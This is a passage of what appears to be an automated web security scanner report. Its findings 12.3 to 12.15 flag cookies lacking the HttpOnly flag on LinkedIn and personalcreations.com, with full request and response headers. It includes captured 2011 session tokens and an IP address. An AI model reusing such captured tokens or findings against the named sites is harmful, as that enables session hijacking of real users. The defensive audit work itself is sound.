GET /reuters/trc/2/json?tim=19%3A48%3A52.780&publisher=reuters&pv=2&list-size=3&list-id=rbox-t2v&id=500&uim=article&intent=s&uip=article&external=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&llvl=1&item-id=USTRE78222D20110904&item-type=text&item-url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&page-id=7ec1fa180194eff20c8fb72aa34c5e7764c06279&sd=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097030&uid=ae7f02b7-d8fc-4e74-9744-efca878a3ea7&cv=4-8-2-1-48560-3339640&uiv=default&cb=TRC.callbacks.recommendations_1 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097030; taboola_wv=; taboola_user_id=ae7f02b7-d8fc-4e74-9744-efca878a3ea7; JSESSIONID=.prod2-f3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 01:01:03 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315098063;Path=/reuters/
Set-Cookie: JSESSIONID=.prod2-f7;Path=/
Set-Cookie: taboola_wv=;Path=/reuters/;Expires=Mon, 03-Sep-12 01:01:03 GMT
Content-Length: 4005

TRC.callbacks.recommendations_1({"trc":{"req":"ebe18cbed15d8f4b449e571f68fc0689","session-id":"cf5b371b2ea2c82fafb75969374381dc","session-data":"v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-
...[SNIP]...

12.3. https://www.linkedin.com/secure/login

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: leo_auth_token="GST:92Y5C7-Duxr1zGVs1Wv1YxDhPErhhqpepcYFrtwDfIrhAIVsQxwMUh:1315099155:0c843f0a96a8006c044aa7d63d7ac676a0c1e9e0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:49:14 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:19:15 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:51:45 GMT;path=/;httponly
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="p
...[SNIP]...

12.4. http://www.personalcreations.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media HTTP/1.1
Host: www.personalcreations.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=uvn4ybjeh3ciqrzoi2ilygjh; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=uvn4ybjeh3ciqrzoi2ilygjh; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-2,trm-1,xtc-1,ttb-4,nte-3,ntc-2,ntb-1,xta-1,trf-2,tpp-3,tbc-1,ntd-1,tvc-2,tmm-1,xtb-1,tnp-1,tpf-2; domain=.personalcreations.com; expires=Thu, 04-Oct-2012 00:48:11 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txc-1,tkt-2,thp-1,txb-1,tks-2,tms-1,mpsmediapersonalitysplit-1; domain=.personalcreations.com; expires=Sun, 04-Sep-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=9/3/2011 5:48:11 PM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=42; domain=.personalcreations.com; expires=Wed, 07-Sep-2011 00:48:11 GMT; path=/
Set-Cookie: PCR_BrowserId=d9954876-3a8e-4f70-8099-40c2ea2161b9; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:48:14 GMT
Content-Length: 166986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...

12.5. http://www.personalcreations.com/apparel-gifts-her-PHERAPP

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /apparel-gifts-her-PHERAPP

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /apparel-gifts-her-PHERAPP HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:25 PM?0&9/3/2011 6:27:59 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:46 PM?0&9/3/2011 6:28:53 PM?0&9/3/2011 6:29:28 PM?0&9/3/2011 6:30:05 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:30:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:30:04 GMT
Connection: close
Content-Length: 280083

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.6. http://www.personalcreations.com/grandparents-day-gifts-PGDPDAY

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /grandparents-day-gifts-PGDPDAY

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /grandparents-day-gifts-PGDPDAY HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:40 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:41 GMT
Connection: close
Content-Length: 243187

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.7. http://www.personalcreations.com/halloween-home-decorations-PHALHOM

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /halloween-home-decorations-PHALHOM

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /halloween-home-decorations-PHALHOM HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:49 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:49 GMT
Connection: close
Content-Length: 201184

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.8. http://www.personalcreations.com/just-because-gifts-PJBEBSL

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /just-because-gifts-PJBEBSL

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /just-because-gifts-PJBEBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:28:30 PM?0&9/3/2011 6:28:03 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:28:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:04 GMT
Connection: close
Content-Length: 413498

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.9. http://www.personalcreations.com/personalized-anniversary-gifts-PANNBSL

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /personalized-anniversary-gifts-PANNBSL

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-anniversary-gifts-PANNBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:48 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:48 GMT
Connection: close
Content-Length: 381211

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.10. http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /personalized-back-to-school-gifts-PBKDB2S

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-back-to-school-gifts-PBKDB2S HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:49 PM?0&9/3/2011 6:19:56 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:56 GMT
Connection: close
Content-Length: 259186

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.11. http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /personalized-birthday-gifts-PBIRBSL

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-birthday-gifts-PBIRBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:13 PM?0&9/3/2011 6:20:03 PM?0&9/3/2011 6:19:51 PM?0&9/3/2011 6:19:27 PM?0&9/3/2011 6:19:46 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:46 GMT
Connection: close
Content-Length: 411135

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.12. http://www.personalcreations.com/personalized-birthday-gifts-her-PHERBIR

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /personalized-birthday-gifts-her-PHERBIR

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-birthday-gifts-her-PHERBIR HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:29:21 PM?0&9/3/2011 6:29:12 PM?0&9/3/2011 6:29:04 PM?0&9/3/2011 6:29:29 PM?0&9/3/2011 6:29:35 PM?0&9/3/2011 6:30:11 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:30:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:30:12 GMT
Connection: close
Content-Length: 318870

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.13. http://www.personalcreations.com/personalized-business-gifts-PBIZGFT

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /personalized-business-gifts-PBIZGFT

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-business-gifts-PBIZGFT HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:48 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:37 PM?0&9/3/2011 6:20:23 PM?0&9/3/2011 6:20:48 PM?0&9/3/2011 6:20:46 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:45 GMT
Connection: close
Content-Length: 189636

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.14. http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /personalized-christmas-gifts-PCHRBSL

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-christmas-gifts-PCHRBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:10 GMT
Connection: close
Content-Length: 418054

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.15. http://www.personalcreations.com/personalized-communion-gifts-PCOMMUN

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /personalized-communion-gifts-PCOMMUN

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-communion-gifts-PCOMMUN HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
